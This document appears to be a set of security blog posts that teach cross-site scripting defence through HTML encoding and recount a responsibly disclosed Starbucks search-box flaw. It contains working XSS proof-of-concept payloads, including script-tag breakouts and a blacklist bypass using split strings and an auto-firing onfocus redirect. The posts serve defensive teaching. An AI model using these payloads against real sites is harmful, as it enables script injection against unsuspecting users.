These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.
Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.
Because data attributes are HTML attributes, quoting their contents is easy. In fact, thereâs really only a couple of quoting rules needed to consider.
&
â) characters need to be HTML encoded to â&
â. "
â Rules 2 & 3 can simply be replaced with âHTML encode everything in the value other than alphanumericsâ before applying rule 1, and if thatâs easier, do that.
HTML parses attribute value strings very simply â look for the first non-space character after the â=
â sign, which is either a quote or not a quote. If itâs a quote, find another one of the same kind, HTML-decode whatâs in between them, and thatâs the attributeâs value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if youâre right:
-
<a onclick="prompt("1")"><a onclick="prompt("1")"></a>
-
<a onclick = "prompt( 1 )"><a onclick = "prompt( 1 )"></a>
-
<a onclick= prompt( 1 ) ><a onclick= prompt( 1 ) ></a>
-
<a onclick= prompt(" 1 ") ><a onclick= prompt(" 1 ") ></a>
-
<a onclick= prompt( "1" ) ><a onclick= prompt( "1" ) ></a>
-
<a onclick= "prompt( 1 )"><a onclick=&#9;"prompt( 1 )"></a>
-
<a onclick= "prompt( 1 )"><a onclick=&#32;"prompt( 1 )"></a>
-
<a onclick= thing=1;prompt(thing)><a onclick= thing=1;prompt(thing)></a>
-
<a onclick="prompt(\"1\")"><a onclick="prompt(\"1\")"></a>
Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?
Hereâs how they look in the Debugger in Internet Explorer 11:
Uh⊠Thatâs not right, particularly line 8. Clearly syntax colouring in IE11âs Debugger window needs some work.
OK, letâs try the DOM Explorer:
Much better â note how the DOM explorer reorders some of these attributes, because itâs reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).
Other browsers have similar capabilities, of course â use whichever one works for you.
Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.
So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named âdata-
something-or-otherâ.
Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag â if youâre operating inside of an event handler, you can simply use the âthis
â object to refer to the object on which the event is handled (so you may want to attach the data-
* attributes to the object which triggers the handler).
If youâre not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way â usually document.getElementById(âŠ)
Once you have the object, you can query an attribute with the function getAttribute(âŠ)
â the single argument is the name of the attribute, and whatâs returned is a string â and any HTML encoding in the data-attribute will have been decoded once.
Other frameworks have ways of accessing this data attribute more easily â for instance, JQuery has a â.data(âŠ)
â function which will fetch a data attributeâs value.
Iâve noted before that stopping XSS is a âsimpleâ matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.
If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function â HTML Encode â and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). Thatâs a lot easier than trying to understand multiple injection contexts each with their own encoding function. Itâs a lot easier to protect the inclusion of arbitrary user data in your web pages, and youâll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isnât a bad thing at all.
You can still kick your own arse.
When converting user input from the string you get from getAttribute
to a numeric value, what function are you going to use?
Please donât say âeval
â.
Eval is evil. Just like innerHtml
and document.write
, its use is an invitation to Cross-Site Scripting.
Use parseFloat()
and parseInt()
, because they wonât evaluate function calls or other nefarious components in your strings.
So, now Iâm hoping your Omniture script looks like this:
<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//â>
</script>
You didnât forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?
P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.
Last time in this series, I posted an example where XSS was possible because a siteâs developer is unaware of the implications that his JavaScript is hosted inside of HTML.
This is sort of the opposite of that, noting that time-worn JavaScript (and C, Java, C++, C#, etc) methods donât always apply to HTML.
I teach that XSS is prevented absolutely by appropriate contextual encoding of user data on its way out of your application and into the page.
The context dictates what encoding you need, whether the context is âJavaScript stringâ, âJavaScript codeâ, âHTML attributeâ, âHTML contentâ, âURLâ, âCSS expressionâ, etc, etc.
In the case of HTML attributes, itâs actually fairly simple.
Unless you are putting a URL into an attribute, there are three simple rules:
Seems easy, right?
This is all kinds of good, except when you run into a site where the developer hasnât really thought about their encoding very well.
You see, HTML attribute values are encoded using HTML encoding, not C++ encoding.
To HTML, the back-slash has no particular meaning.
I see this all the time â I want to inject script, but the site only lets me put user data into an attribute value:
<meta name="keywords" content="Wot I searched for">
Thatâs lovely. Iâd like to put "><script>prompt(1)</script> in there as a proof of concept, so that it reads:
<meta name="keywords" content=""><script>prompt(1)</script>">
The dev sees this, and cuts me off, by preventing me from ending the quoted string that makes up the value of the content attribute:
<meta name="keywords" content="\"><script>prompt(1)</script>">
Nice try, Charlie, but that back-slash, itâs just a back-slash. It means nothing to HTML, and so my quote character still ends the string. My prompt still executes, and you have to explain why your âfixâ got broken as soon as you released it.
Oh, if only you had chosen the correct HTML encoding, and replaced my quote with â"â [and therefore, also replace every â&â in my query with â&â], weâd be happy.
And this, my friends, is why every time you implement a mitigation, you must test it. And why you follow the security teamâs guidance.
Exercise for the reader â how do you exploit this example if I donât encode the quotes, but I do strip out angle brackets?
I saw this again today. I tried smiling, but could only manage a weak grin.
You think youâve defeated my XSS attack. How did you do that?
Sure, I can no longer turn this:
<script> s_prop0="[user-input here]"; </script>.csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; }
into this, by providing user input that consists of ";nefarious();//
:
<script> s_prop0="";nefarious();//"; </script>.csharpcode, .csharpcode pre
{
font-size: small;
color: black;
font-family: consolas, “Courier New”, courier, monospace;
background-color: #ffffff;
/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt
{
background-color: #f4f4f4;
width: 100%;
margin: 0em;
}
.csharpcode .lnum { color: #606060; }
Instead, I get this:
<script> s_prop0="\";nefarious();//"; </script>.csharpcode, .csharpcode pre
{
font-size: small;
color: black;
font-family: consolas, “Courier New”, courier, monospace;
background-color: #ffffff;
/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt
{
background-color: #f4f4f4;
width: 100%;
margin: 0em;
}
.csharpcode .lnum { color: #606060; }
But, and this surprises many web developers, if thatâs all youâve done, I can still close that script tag.
INSIDE THE STRING
Yes, thatâs bold, italic and underlined, because developers see this, and think âI have no idea how to parse thisâ:
<script> s_prop0="</script><script>nefarious();</script>"; </script>
Fortunately, your browser does.
First it parses it as HTML.
This is important.
The HTML parser knows nothing about your JavaScript, it uses HTML rules to parse HTML bodies, and to figure out where scripts start and end.
So, when the HTML parser sees â<script>â, it creates a buffer. It starts filling that buffer with the first character after the tag, and it ends it with whatever character precedes the very next â</script>â tag it sees.
This means the HTML above gets interpreted as:
1. a block of script that wonât run, because itâs not complete code and generates a syntax error.
s_prop="
2. a block of script that will run, because it parses properly.
nefarious();
3. a double-quote character, a semi-colon, and an unnecessary end tag that it discards
Obviously, your code is more complex than mine, so this kind of injection has all kinds of nasty effects â but itâs possible for an attacker to hide those (not that the attacker needs to!)
If you truly have to insert data from users into a JavaScript string, remember what itâs embedded in â HTML.
There are three approaches:
What are you embedded in? A JavaScript string embedded in HTML. You canât HTML-encode your JavaScript content (try it and youâll see it doesnât work that way), so you have to JavaScript-string-encode anything that might make sense either to the HTML parser OR the JavaScript parser.
You know I donât like blacklists, but in this case, the only characters you actually need to encode are the double-quote, the back-slash (because otherwise you canât uniquely reverse the encoding), and either the less-than or forward-slash.
But, since I donât like blacklists, Iâd rather you chose to encode everything other than alphanumeric and spaces â it doesnât cost that much.
Give it an id, and the JavaScript can reference it by that id. This means you only have to protect the user-supplied data in one place, and it wonât appear a dozen times throughout the document.
OK, aside from last weekendâs post, where I demonstrated how a weak blacklist is no defence, itâs important to remember that the web changes day by day. Not every browser is standard, and they each try to differentiate themselves from the other browsers by introducing âkiller featuresâ that the other browsers donât have for a few weeks.
As a result, you canât really rely on the HTML standard as the one true documentation of all things a browser may do to your code.
Tags change, who knows if tomorrow a <script> tag might not be âpausableâ by a <pause>Some piece of text</pause> tag? Ludicrous, maybe, until someone decides itâs a good idea. Or something else.
As a result, if you want to be a robust developer who produces robust code, you need to think less in terms of âwhatâs the minimum I have to encode?â, and more in terms of âwhatâs the cost of encoding, and whatâs the cost of failure if I donât encode something that needs it?â
Iâve been playing a lot lately with cross-site scripting (XSS) â you can tell that from my previous blog entries, and from the comments my colleagues make about me at work.
Somehow, I have managed to gain a reputation for never leaving a search box without injecting code into it.
And to a certain extent, thatâs deserved.
But I always report what I find, and I donât blog about it until Iâm sure the company has fixed the issue.
Right, and having known a few people whoâve worked in the Starbucks security team, I was surprised that I could find anything at all.
Yet it practically shouted at me, as soon as I started to inject script:
Well, thereâs pretty much a hint that Starbucks have something in place to prevent script.
But itâs not the only thing preventing script, as I found with a different search:
So, one search takes me to an âoopsâ page, another takes me to a page telling me that nothing happened â but without either one executing the script.
The oops page doesnât include any of my script, so I donât like that page â it doesnât help my injection at all.
The search results page, however, that includes some of my script, so if I can just make that work for me, Iâll be happy.
Viewing source is pretty helpful, so hereâs what I get from that, plus searching for my injected script:
So, while my intended JavaScript, â”-prompt(1)-“â, is not executed, and indeed is in the wrong context to be executed, every character has successfully made it into the source sent back to the userâs browser.
At this point, I figure that I need to find some execution that is appropriate for this context.
Maybe the XSS fish will help, so I search for that:
Looks promising â no âoopsâ, letâs check the source:
This is definitely working. At this point, I know the site has XSS, I just have to demonstrate it. If I was a security engineer at Starbucks, this would be enough to cause me to go beat some heads about.
This is enough evidence that a site has XSS issues to make a developer do some work on fixing it. I have escaped the containing quotes, I have terminated/escaped the HTML tag I was in, and I have started something like a new tag. I have injected into your page, and now all weâre debating about is how much I can do now that Iâve broken in.
I have to go on at this point, because Iâm an external researcher to this company. I have to deliver to them a definite breach, or theyâll probably dismiss me as a waste of time.
The obvious thing to inject here is â”><script>prompt(1)</script>â â but we saw earlier that produced an âoopsâ page. Weâve seen that âprompt(1)â isnât rejected, and the angle-brackets (chevrons, less-than / greater-than signs, etc, whatever you want to call them) arenât rejected, so it must be the word âscriptâ.
That, right there, is enough to tell me that instead of encoding the output (which would turn those angle-brackets into â<â and â>â in the source code, while still looking like angle-brackets in the display), this site is using a blacklist of âbad words to search forâ.
Thatâs a really good question â and the basic answer is because you just canât make most blacklists complete. Only if you have a very limited character set, and a good reason to believe that your blacklist can be complete.
A blacklist that might work is to say that you surround every HTML tagâs attributes with double quotes, and so your blacklist is double quotes, which you encode, as well as the characters used to encode, which you also encode.
I say it âmight workâ, because in the wonderful world of Unicode and developing HTML standards, there might be another character to escape the encoding, or a set of multiple code points in Unicode that are treated as the encoding character or double quote by the browser.
Easier by far, to use a whitelist â only these few characters are safe,and ALL the rest get encoded.
You might have an incomplete whitelist, but thatâs easily fixed later, and at its worst is no more than a slight inefficiency. If you have an incomplete blacklist, you have a security vulnerability.
OK, so having determined that I canât use the script tag, maybe I can add an event handler to the tag Iâm in the middle of displaying, whether itâs a link or an input. Perhaps I can get that event handler to work.
Ever faithful is the âonmouseoverâ event handler. So I try that.
You donât need to see the âoopsâ page again. But I did.
The weirdest thing, though, is that the âonmooseoverâ event worked just fine.
Except I didnât have a moose handy to demonstrate it executing.
So, that means that they had a blacklist of events, and onmouseover was on the list, but onmooseover wasnât.
Similarly, âonfocusâ triggered the âoopsâ page, but âonficusâ didnât. Again, sadly I didnât have a ficus with me.
Sure, but then so is the community of browser manufacturers. Thereâs a range of âontouchâ events that werenât on the blacklist, but are supported by a browser or two â and then you have to wonder if Google, maker of the Chrome browser and the Glass voice-controlled eyewear, might not introduce an event or two for eyeball tracking. Maybe a Kinect-powered browser will introduce âonwaveatâ. Again, the blacklist isnât future-proof. If someone invents a new event, you have to hope you find out about it before the attackers try to use it.
Then I tried adding characters to the beginning of the event name. Curious â that works.
And, yes, the source view showed me the event was being injected. Of course, the browser wasnât executing it, because of course, â?onmouseoverâ canât be executed. The HTML spec just doesnât allow for it.
Eventually, I made my way through the ASCII table to the forward-slash character.
Yes, thatâs it, that executes. Thereâs the prompt.
Weirdly, if I used âalertâ instead of âpromptâ, I get the âoopsâ page. Clearly, âalertâ is on the blacklist, âpromptâ is not.
I still want to make this a âhotterâ report before I send it off to Starbucks, though.
Well, itâd be nice if it didnât require the user to find and wave their mouse over the page element that youâve found the flaw in.
Fortunately, Iâd also recently found a behaviour in Internet Explorer that allows a URL to set focus to an element on the page by its ID or name. And thereâs an âonfocusâ event I can trigger with â/onfocusâ.
So, there we are â automated execution of my chosen code.
Sure â how about something an attacker might try â a redirect to a site of their choosing. [But since Iâm not an attacker, weâll do it to somewhere acceptable]
I tried to inject âonfocus=âdocument.location=â//google.comâââ â but apparently, âdocumentâ and âlocationâ are also on the banned list.
âownerDocuâ, âmentâ, âlocaâ and âtionâ arenât on the blacklist, so I can do âthis[“ownerDocu”+”ment”][“loca”+”tion”]=â âŠ
Very quickly, this URL took the visitor away from the Starbucks search page and on to the Google page.
Now itâs ready to report.
Well, no, not really. This took me a couple of months to get reported. I tried âsecurity@starbucks.comâ, which is the default address for reporting security issues.
An auto-reply comes my way, informing me this is for Starbucks staff to report [physical] security issues.
I try the webmaster@ address, and that gets me nowhere.
The âContact Usâ link takes me to a customer service representative, and an entertaining exchange that results in them telling me that theyâve passed my email around everyone whoâs interested, and the general consensus is that I should go ahead and publish my findings.
No, Iâm not interested in self-publicising at the cost of someone elseâs security. I do this so that things get more secure, not less.
So, I reach out to anyone I know who works for Starbucks, or has ever worked for Starbucks, and finally get to someone in the Information Security team.
The Information Security team works with me, politely, quickly, calmly, and addresses the problem quickly and completely. The blacklist is still there, and still takes you to the âoopsâ page â but itâs no longer the only protection in place.
My âonmooseoverâ and âonficusâ events no longer work, because the correct characters are quoted and encoded.
The world is made safer and more secure, and a half a year later, I post this article, so that others can learn from this experience, too.
By withholding publishing until well after the site is fixed, I ensure that Iâm not making enemies of people who might be in a position to help me later. By fixing the site quickly and quietly, Starbucks ensure that they protect their customers. And I, after all, am a customer.
The Starbucks Information Security team have also promised that there is now a route from security@ to their inbox, as well as better training for the customer service team to redirect security reports their way, rather than insisting on publishing. I think they were horrified that anyone suggested that. I know I was.
And did I ever tell you about the time I got onto Googleâs hall of fame?
Iâve found a new weekend hobby â it takes only a few minutes, is easily interruptible, and reminds me that the state of web security is such that I will never be out of a job.
I open my favourite search engine (Iâm partial to Bing, partly because I get points, but mostly because Iâve met the guys who built it), search for âsecurity blogâ, and then pick one at random.
Once Iâm at the security blog site â often one Iâve never heard of, despite it being high up in the search results â I find the search box and throw a simple reflected XSS attack at it.
If that doesnât work, I view the source code for the results page I got back, and use the information I see there to figure out what reflected XSS attack will work. Then I try that.
[Note: I use reflected XSS, because I know I can only hurt myself. I donât play stored XSS or SQL injection games, which can easily cause actual damage at the server end, unless I have permission and Iâm being paid.]
Finally, I try to find who I should contact about the exploitability of the site.
Itâs interesting just how many of these sites are exploitable â some of them falling to the simplest of XSS attacks â and even more interesting to see how many sites donât have a good, responsive contact address (or prefer simply not to engage with vuln discoverers).
I clearly wouldnât dream of disclosing any of the vulnerabilities Iâve found until well after theyâre fixed. Of course, after theyâre fixed, Iâm happy to see a mention that Iâve helped move the world forward a notch on some security scale. [Not sure why Iâm not called out on the other version of that changelog.] I might allude to them on my twitter account, but not in any great detail.
From clicking the link to exploit is either under ten minutes or not at all â and reporting generally takes another ten minutes or so, most of which is hunting for the right address. The longer portion of the game is helping some of these guys figure out what action needs to be taken to fix things.
You can try using a WAF to solve your XSS problem, but then youâve got two problems â a vulnerable web site, and that you have to manage your WAF settings. If you have a lot of spare time, you can use a WAF to shore up known-vulnerable fields and trap known attack strings. But it really doesnât ever fix the problem.
If you can, donât echo back to me what I sent you, because thatâs how these attacks usually start. Donât even include it in comments, because a good attack will just terminate the comment and start injecting HTML or script.
Unless youâre running a source code site, you probably donât need me to search for angle brackets, or a number of other characters. So take them out of my search â or plain reject my search if I include them in my search.
OK, so you donât have to encode the basics â what are the basics? I tend to start with alphabetic and numeric characters, maybe also a space. Encode everything else.
Yeah, thatâs always the hard part. Encode it using the right encoding. Thatâs the short version. The long version is that you figure out whatâs going to decode it, and make sure you encode for every layer that will decode. If youâre putting my text into a web page as a part of the pageâs content, HTML encode it. If itâs in an attribute string, quote the characters using HTML attribute encoding â and make sure you quote the entire attribute value! If itâs an attribute string that will be used as a URL, you should URL encode it. Then you can HTML encode it, just to be sure.
[Then, of course, check that your encoding hasnât killed the basic function of the search box!]
You should definitely respond to security reports â I understand that not everyone can have a 24/7 response team watching their blog (I certainly donât) â you should try to respond within a couple of days, and anything under a week is probably going to be alright. Some vuln discoverers are upset if they donât get a response much sooner, and see that as cause to publish their findings.
Me, I send a message first to ask if Iâve found the right place to send a security vulnerability report to, and only when I receive a positive acknowledgement do I send on the actual details of the exploit.
Iâve said before that I wish programmers would respond to reports of XSS as if Iâd told them I caught them writing a bubble sort implementation in Cobol. Full of embarrassment at being such a beginner.